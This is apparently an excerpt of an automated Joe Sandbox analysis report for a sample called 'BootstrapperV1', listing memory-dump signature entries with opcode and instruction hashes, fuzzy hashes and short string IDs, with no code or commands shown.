                                              • Opcode ID: 172bd12b8bcfc6a2b25c44b8a47c8bf23dd71c6d78fae2bb3d5d76ed432b30a2
                                              • Instruction ID: 8a6af67f6dc206d3da63580dc029ac621bab573c74b03fffa9492ec262ce9111
                                              • Opcode Fuzzy Hash: 172bd12b8bcfc6a2b25c44b8a47c8bf23dd71c6d78fae2bb3d5d76ed432b30a2
                                              • Instruction Fuzzy Hash: 0FB16A31A0E7890FEB65DB5894A56F53BA1FF94360F0601FAD48CCB1B7D924E945C390
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [A
                                              • API String ID: 0-3164954885
                                              • Opcode ID: 3ca0d03595b7fe232148878ef95f0bb728c377f5dbb61ed07e497a7d3ac9c8e4
                                              • Instruction ID: 1a8487f291902144943c3eba4cf59eaeed3b742dd15d3066670984b84747b861
                                              • Opcode Fuzzy Hash: 3ca0d03595b7fe232148878ef95f0bb728c377f5dbb61ed07e497a7d3ac9c8e4
                                              • Instruction Fuzzy Hash: 82911A2270EB8E0FE7B996AC68666B57BE1EF5632070512FFD049C71B3DD09AC428350
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 0d4a81454d86dcf3b22497b769933d43fcb9558c7c05dae6b540d0bf7fb8d92d
                                              • Instruction ID: 87d19a51d356e933a3a6f483f4eb6e0781b328bd633ae5c352aecb24b0a04e85
                                              • Opcode Fuzzy Hash: 0d4a81454d86dcf3b22497b769933d43fcb9558c7c05dae6b540d0bf7fb8d92d
                                              • Instruction Fuzzy Hash: 24B12371A0DB8D4FEB95EFAC8464BA97BE1EF59300F0502BAD059C71B7DE28A901C710
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H
                                              • API String ID: 0-2852464175
                                              • Opcode ID: 45818bc4dff892cb83445904cdaea3b72b19d3cb6daff2e0a9550973cad281ff
                                              • Instruction ID: 320b5d6478f1626744ea67c3b9bd7528d31e5800151d27f3f49c2aa6f93aaf49
                                              • Opcode Fuzzy Hash: 45818bc4dff892cb83445904cdaea3b72b19d3cb6daff2e0a9550973cad281ff
                                              • Instruction Fuzzy Hash: AF31A172A0DB894FF750A768582E7B5B7E1EFA4301F09057ED48DC31B2DD28AA468351
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H
                                              • API String ID: 0-2852464175
                                              • Opcode ID: a1263772f8e9da221154bd9c2028509cb0ff333294dd418c45cec19a54e36884
                                              • Instruction ID: 78440578daaf22adddf6fd80e57e1842ade941e8a7deac13852e9b42bb6e5e5f
                                              • Opcode Fuzzy Hash: a1263772f8e9da221154bd9c2028509cb0ff333294dd418c45cec19a54e36884
                                              • Instruction Fuzzy Hash: BF81553171EB4A4FD3699B68D89597077E0EF55320B1903BED08DC72B3D929B8438781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ?Q_H
                                              • API String ID: 0-2706832213
                                              • Opcode ID: 8ec6f249dda5e65d71e53db722eea2d6cd6ff6daafe328538370b9e6d0c59a04
                                              • Instruction ID: 5dc20389bad14208ebc8c34fb9482feb628b8c83c8c9dbb033e1c6a4b5d85a0a
                                              • Opcode Fuzzy Hash: 8ec6f249dda5e65d71e53db722eea2d6cd6ff6daafe328538370b9e6d0c59a04
                                              • Instruction Fuzzy Hash: D471083270DD0D0FEAA8EB5C9465BB933D1EF99310B0602BAE44DC72B6DE19ED428351
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: zJ_H
                                              • API String ID: 0-502210507
                                              • Opcode ID: 7bfd1a73a892ceaf7ec8573104db7b7762bbbca53cc01400b4d335cd07fc1023
                                              • Instruction ID: 788e1216ae2b6486cb59a8a5d34be2126f35fa80bad0a28f2384025592ca3ecd
                                              • Opcode Fuzzy Hash: 7bfd1a73a892ceaf7ec8573104db7b7762bbbca53cc01400b4d335cd07fc1023
                                              • Instruction Fuzzy Hash: 73815A71A0EBCE0FEBA1DB6894A56A93FE2EF56350F0901BAD49CC71B3DD146906C311
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: kK_H
                                              • API String ID: 0-4102571270
                                              • Opcode ID: 9d664adbe3465a1f9793407936275abb55570af9a6994037c00dd2a8a7b3600f
                                              • Instruction ID: 3441ed8ae3984d62bf0584a2544988394f48d3b8f080b0128671f610c94e1af4
                                              • Opcode Fuzzy Hash: 9d664adbe3465a1f9793407936275abb55570af9a6994037c00dd2a8a7b3600f
                                              • Instruction Fuzzy Hash: 02713862B1DE4E0FE7E4A66C94A59F577D1EF9431074502BBE49EC32F6DD18AE028340
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CU_H
                                              • API String ID: 0-2276871341
                                              • Opcode ID: 514fdf4ee0d7fc7153dc6dfc9b913345a854f78f294deb74451cdad63d3c09cb
                                              • Instruction ID: 65f892954b9d7d1760b0981fa2a2392a3ac231524a4c4f88a5e536b789adfdee
                                              • Opcode Fuzzy Hash: 514fdf4ee0d7fc7153dc6dfc9b913345a854f78f294deb74451cdad63d3c09cb
                                              • Instruction Fuzzy Hash: 31715D62B0EA890FE7A8966C18797747BD2DF99250B1A01FBD09CC72F7DC056D068351
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PK_^
                                              • API String ID: 0-662081527
                                              • Opcode ID: ebc10a0f08b0eea131df3d27ab93f2c5ee94d4cdde6c6c52779e263a67aadd82
                                              • Instruction ID: 47f64e7ddfc66e565ca15153a11cfd8054babb67b38436cf6082747a62c7e82e
                                              • Opcode Fuzzy Hash: ebc10a0f08b0eea131df3d27ab93f2c5ee94d4cdde6c6c52779e263a67aadd82
                                              • Instruction Fuzzy Hash: F5715913B0DA8A0EE314BBBCB8659E977A0EF8133975947B7D1DDCA0E7DC0865468380
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: U_H
                                              • API String ID: 0-67921172
                                              • Opcode ID: b7aeb7a89acd2f2020ac6263d5291051f4d6807e0504487c29831b7be2a8e0a6
                                              • Instruction ID: 180674564e1d9dc497379ce4c90c7368a3e20a7e0c7be519928592179adef471
                                              • Opcode Fuzzy Hash: b7aeb7a89acd2f2020ac6263d5291051f4d6807e0504487c29831b7be2a8e0a6
                                              • Instruction Fuzzy Hash: 37815571E1991D4BEBA8DB5C98997A873F1EF98340F1106FAD01CD31A5DE346E828F50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PK_^
                                              • API String ID: 0-662081527
                                              • Opcode ID: bd16f0c1e59d097ad709ec5c0983696d8690fd368a7307c00b7e676f5dc91366
                                              • Instruction ID: a5d98a0377907e89273cd02be307a10b151b5be796ca2b6c91620f8a60f14557
                                              • Opcode Fuzzy Hash: bd16f0c1e59d097ad709ec5c0983696d8690fd368a7307c00b7e676f5dc91366
                                              • Instruction Fuzzy Hash: 7B615613B0D6560AE318B7BCB8A5CEA77A0EF8133E75943B7D1DD890D7DC1861868390
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 1bc824fa48948a0887e7cc79a10938569b09d1ee385af74442ff54305decd740
                                              • Instruction ID: 28733ad6646397d756cdeaa8368722423540f6acc797af5344ee19cf394939e5
                                              • Opcode Fuzzy Hash: 1bc824fa48948a0887e7cc79a10938569b09d1ee385af74442ff54305decd740
                                              • Instruction Fuzzy Hash: 9A61383170DA4D4FE7A5EE6C88A5B7437D1EF89310B0601BAD44DC72B7CD28AC4283A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: tJ_H
                                              • API String ID: 0-4247808248
                                              • Opcode ID: 24dd05bf3161e3ce89502752e66929bd5a7c405f18871fffba578e069f600f5e
                                              • Instruction ID: 4e5f8ffcb9083faf24c94d07c19f921d9535797ff60ddad511f1be3897ccbb0f
                                              • Opcode Fuzzy Hash: 24dd05bf3161e3ce89502752e66929bd5a7c405f18871fffba578e069f600f5e
                                              • Instruction Fuzzy Hash: E46118A1B0EACD0FD7A2DB7848B57A57BE1EF59610F0901BAD098C72B7DD146C06C391
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A
                                              • API String ID: 0-3554254475
                                              • Opcode ID: 5c5b5bd95e339512b3b6e445263a3e0fdba58091bd20d74b4bad94cf483a37f9
                                              • Instruction ID: d3d91dd087039f7455bb9ec08affdedfcc55229e19f425f3ba38a0c574bd4979
                                              • Opcode Fuzzy Hash: 5c5b5bd95e339512b3b6e445263a3e0fdba58091bd20d74b4bad94cf483a37f9
                                              • Instruction Fuzzy Hash: 61514831B0EB490FEB68DA6C94646B577D2EF95310B0542BAD44ECB1F7DD29BE418380
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: tJ_H
                                              • API String ID: 0-4247808248
                                              • Opcode ID: e78e743c53ebce7a90e0c6e665aa900c195424372cb1642380a00f784b2b8fa4
                                              • Instruction ID: df190ed9054feb3c0451e9176459317fd1c1cf3d22b085a5630a1581d3c47fcb
                                              • Opcode Fuzzy Hash: e78e743c53ebce7a90e0c6e665aa900c195424372cb1642380a00f784b2b8fa4
                                              • Instruction Fuzzy Hash: AA513872B0DA4D0FDBA5DA6C54A57A977E2EF98700F0901BAE05CC33B6DD246C028391
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: IX_H
                                              • API String ID: 0-3771940762
                                              • Opcode ID: 43bf837b2e1b9ee0b4cbdf1db2eee98f064ae690bb585c36af2c3e49363e6d65
                                              • Instruction ID: 7e0df40346d4ff19621453f17ce3bd85ddcd653302b48fadf811d5b2126bf54c
                                              • Opcode Fuzzy Hash: 43bf837b2e1b9ee0b4cbdf1db2eee98f064ae690bb585c36af2c3e49363e6d65
                                              • Instruction Fuzzy Hash: 4341E062B0EF4E0FEBBC969C647537437E1EBA825071606BBD44DD72B2DD05AD0683A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: U
                                              • API String ID: 0-3372436214
                                              • Opcode ID: 0caee5a246cb819fccce2b4ef7b9d350830b128d5048175299b06231052697b6
                                              • Instruction ID: fbbae7604646e9f190422da9b9ecdd92705f8ef7397955880ad4700254720602
                                              • Opcode Fuzzy Hash: 0caee5a246cb819fccce2b4ef7b9d350830b128d5048175299b06231052697b6
                                              • Instruction Fuzzy Hash: 3051E53160D7C94FDB569778882AAA57FF1EF57210F0902EFD08ACB1B3D918A8068391
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: U
                                              • API String ID: 0-3372436214
                                              • Opcode ID: 9d0cdedc417c2dcc38abe439df78865f7522400ac91461acddf0edda053b92c0
                                              • Instruction ID: 274e3b63214002ef0329b4d58bc7c91cefcfc075df97cf5fa9d40efbfc81b1ff
                                              • Opcode Fuzzy Hash: 9d0cdedc417c2dcc38abe439df78865f7522400ac91461acddf0edda053b92c0
                                              • Instruction Fuzzy Hash: 3241193160D7C94FD756976488266A47FF1EF47610F0902EFD089CB1F3DA19A806C791
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: d91a7478bb9e950aa0e490bf0eecc954def99e24153c92c6792adea97f75ebd5
                                              • Instruction ID: 95596b6d62d50105b26a2e59c720d4e2fe8746c184e08270b801439c394244c0
                                              • Opcode Fuzzy Hash: d91a7478bb9e950aa0e490bf0eecc954def99e24153c92c6792adea97f75ebd5
                                              • Instruction Fuzzy Hash: F0310863B0E68E0FF7689AAC64692F87BA0DF95260F0506B7D048DB0F3DD1429068361
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: U
                                              • API String ID: 0-3372436214
                                              • Opcode ID: 4ed5c9de7acd41b7a03ac5d8af0021a3cc3288ce4ed8b844cfcf34d972069163
                                              • Instruction ID: 247713fa3d254b4e3d4ec6fe031e2e11e00ab5165ec5607645c04c5bd39eef52
                                              • Opcode Fuzzy Hash: 4ed5c9de7acd41b7a03ac5d8af0021a3cc3288ce4ed8b844cfcf34d972069163
                                              • Instruction Fuzzy Hash: CF31E23191DB884FDB14AF589C1A5E9BFE4EF96710F00016FE88AD3162DA60F94587C3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [G
                                              • API String ID: 0-1439089712
                                              • Opcode ID: 8fd06d0696f432b6089c73d90f036357f3ccba0cb3a95f13dc2b6c6486a11157
                                              • Instruction ID: c94de24b44925aac6e1a23dd95191c46fc0993d230622851ff6d622749520a19
                                              • Opcode Fuzzy Hash: 8fd06d0696f432b6089c73d90f036357f3ccba0cb3a95f13dc2b6c6486a11157
                                              • Instruction Fuzzy Hash: AB112B22B1DA1D0BE7A4AE2CEC157B673C4DB98351F05067BF44DC62B1EE19DA828391
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [A
                                              • API String ID: 0-3164954885
                                              • Opcode ID: 2fe78cd3cde200c257766b89275f2f9659bfe624033cdb1607599ec6f254ced9
                                              • Instruction ID: f89a4b4a1733a7b5d41adad0fbaaaa9a5d6f7defaeca66b4d98c3b6f0a07df3e
                                              • Opcode Fuzzy Hash: 2fe78cd3cde200c257766b89275f2f9659bfe624033cdb1607599ec6f254ced9
                                              • Instruction Fuzzy Hash: 6D11062160EBC91FE376A7785C662B13FE0DF5621470A01FBE489C71B3D8085D824361
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [`
                                              • API String ID: 0-4039930203
                                              • Opcode ID: 7aa3350eb7761eb1b3e3bd10bb96ade650267038f7cf4e3f05b17114d2b06f5f
                                              • Instruction ID: 9bdead961ab9deec12fb50f6915ca8d48633e3585b00021aa19ac6fdbbdd0bb7
                                              • Opcode Fuzzy Hash: 7aa3350eb7761eb1b3e3bd10bb96ade650267038f7cf4e3f05b17114d2b06f5f
                                              • Instruction Fuzzy Hash: AAE09281F1E2890AE11322B918350BC2BA08F9731074805F7C085C70B6DC08250AD392
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: V
                                              • API String ID: 0-1342839628
                                              • Opcode ID: 8f1823615a30c636be59803deb93991dda769dde4e95439617d2e8a0986dfe33
                                              • Instruction ID: 55580f9001da782da29236204d7dab7b4ac474ce19263089337115f7f6c7a0ff
                                              • Opcode Fuzzy Hash: 8f1823615a30c636be59803deb93991dda769dde4e95439617d2e8a0986dfe33
                                              • Instruction Fuzzy Hash: 49E0DF21E2E7D90FDB6A677818B12A43B61DF46210F8A00FBC458CB1EBD96D0C4A4393
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 451c4fa8d5cd3bae0a4562d57b74bb25511e90032a668c12da6869e610142954
                                              • Instruction ID: 6d6b3a45083a6479f31f183d13e7bd866c537ef93d0c5b66f76973c2123b92ca
                                              • Opcode Fuzzy Hash: 451c4fa8d5cd3bae0a4562d57b74bb25511e90032a668c12da6869e610142954
                                              • Instruction Fuzzy Hash: 4622AD6190E7C65FE31BDBB854AA5B57FA0DF0B214B1A05FED0C99F2B3C8296446C321
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 72f7d755b6e0cb9fb25eff946586d4bdf8d07936135be2dd8ada12b16342da20
                                              • Instruction ID: e67b0f2f2f0b916d52cd8e9221f33d843654c59096026a43ce7e74c85a033118
                                              • Opcode Fuzzy Hash: 72f7d755b6e0cb9fb25eff946586d4bdf8d07936135be2dd8ada12b16342da20
                                              • Instruction Fuzzy Hash: 79E11721B0DB4D4FEB65A77844766B977E1EF99700B0502BED48DC32F3DD28A9428391
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1f25c679e1d859cfb45914a1c1ba64cbfac2c5994be639e6bf1d25cdc21b5adc
                                              • Instruction ID: e70898663d702aff37144cde5d7d5e881547b6b13467dd836fd16d8c9c114062
                                              • Opcode Fuzzy Hash: 1f25c679e1d859cfb45914a1c1ba64cbfac2c5994be639e6bf1d25cdc21b5adc
                                              • Instruction Fuzzy Hash: 9741E562A0EACA1FE762937C44397B97BE1EF56210F0D41FAC098CB1F3DE1969068341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c28e5e9b9f791be93ffa59e890a9c5f2419d3ef3e62a9480704f2a2579a503ed
                                              • Instruction ID: 1c4954ee45526288c2a760a8fd9549c6c81719fb9f6163bccce5a541c4826bff
                                              • Opcode Fuzzy Hash: c28e5e9b9f791be93ffa59e890a9c5f2419d3ef3e62a9480704f2a2579a503ed
                                              • Instruction Fuzzy Hash: EDF1E670A1DB4D4FE764EB2884696B6B7E2FFA8300F45457DD48DC72B6DE34A8028742
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cae0a3b54fd09932a6913577010b2cf3b5e0ab21778ef49e94d1b3c4038511e5
                                              • Instruction ID: 0d8f730227a729741d132ae9e2b8d6f657de73e0869bf70586e963f57e3fbb4b
                                              • Opcode Fuzzy Hash: cae0a3b54fd09932a6913577010b2cf3b5e0ab21778ef49e94d1b3c4038511e5
                                              • Instruction Fuzzy Hash: 06E10331A0DA4D4FEB98DF68C865ABA77E1FF99310F0501BED04EC71A6DE25A842C740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 921d9b7344373009ef213dd89ae4ffa6fc463a9d7bcbe3915a26c2163eba2209
                                              • Instruction ID: 93554bcd3bddab93fa6a398be22c9cd653761bd986292a414a399a76c18ba16f
                                              • Opcode Fuzzy Hash: 921d9b7344373009ef213dd89ae4ffa6fc463a9d7bcbe3915a26c2163eba2209
                                              • Instruction Fuzzy Hash: 52D11821B0DB4D0FEB98EB6C946967877D2EF99250B0502BAE44DC72F3ED18AD428351
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9b1cbaa86840d962acb86474d21959c9357fcbde69ee115bbfe90df8f93da8a
                                              • Instruction ID: 710fd8aff5978cd5b2f0360849d2af8678629a10d1805b00c84fdba18038a5c7
                                              • Opcode Fuzzy Hash: b9b1cbaa86840d962acb86474d21959c9357fcbde69ee115bbfe90df8f93da8a
                                              • Instruction Fuzzy Hash: 8FE1C670A1DB4D4FE764EB2884697B6B7E2FFA4300F55457DE48DC32A6DE34A8028742
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 72a964c08f978310b89f61f6fc829c8c391a9accdf8892960de3877c9b5553d1
                                              • Instruction ID: 8fc3a81ef0ba0bd352d648a84afe206e1680826809ba01fb48b8f257d10dbb36
                                              • Opcode Fuzzy Hash: 72a964c08f978310b89f61f6fc829c8c391a9accdf8892960de3877c9b5553d1
                                              • Instruction Fuzzy Hash: 91D11621B0E74A4BF77996A884B13B977D2EF45300F265A7AC48FCB1F2CC197A424361
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dc11dc64085c859ae93cbf1c9959aec4d0449b2056c8456844c346e899611a1a
                                              • Instruction ID: acfd21dc189f505a7c320e90247b7179978a678716e1e1111f6076ed354e3561
                                              • Opcode Fuzzy Hash: dc11dc64085c859ae93cbf1c9959aec4d0449b2056c8456844c346e899611a1a
                                              • Instruction Fuzzy Hash: 53D1AF30719B094FE7A8EB688465AA573E1FF59314F1105BED48EC72B3EE29E902C700
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f329bc606b8ccc464646ccdc05e51a93cdb22ca96cdffd9af105eff9e101a388
                                              • Instruction ID: c1e5f89bbcf2072602d99027724c8bb8b73a893c3897308f4d64d834ac96877c
                                              • Opcode Fuzzy Hash: f329bc606b8ccc464646ccdc05e51a93cdb22ca96cdffd9af105eff9e101a388
